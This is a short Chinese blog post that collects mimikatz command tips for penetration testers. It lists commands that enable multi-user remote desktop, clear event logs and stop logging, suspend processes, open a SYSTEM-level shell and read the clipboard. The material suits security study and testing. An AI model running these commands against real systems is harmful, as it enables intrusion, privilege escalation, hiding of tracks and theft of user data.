去到mimikatz的的作者的github的时候,发现了不少技巧,遂就想着了解一下其他的。
嗯,在找资料的时候发现了一份非常好的资料,同时又发现了有人一件翻译成中文了。
这是译文:http://drops.xmd5.com/static/drops/tools-12462.html,这是原文:https://adsecurity.org/?page_id=1821

官方WIKI:https://github.com/gentilkiwi/mimikatz/wiki
作者博客:http://blog.gentilkiwi.com/

  1. 解决windows PC版本不能多用户登陆3389的情况
    mimikatz # privilege::debug
    mimikatz # ts::multirdp
    

    更多知识:渗透技巧——Windows系统远程桌面的多用户登录

  2. 查看当前登陆的会话
    ts::session

  3. service::list
    列出服务

  4. 清除日志
    event::clear

  5. 后面的操作不被系统记录
    event::drop

  6. 进程操作

    process::suspend /pid:2768  暂停进程
    process::resume /pid:2768   恢复进程
    
  7. 获取系统system
    mimikatz # privilege::debug
    mimikatz # process::runp //以system启动一个新的mimikatz的交互式shell
    mimikatz # process::runp /run:cmd //以system启动一个新的cmd

  8. 获取粘贴板信息
    misc::clip

发表评论

电子邮件地址不会被公开。 必填项已用*标注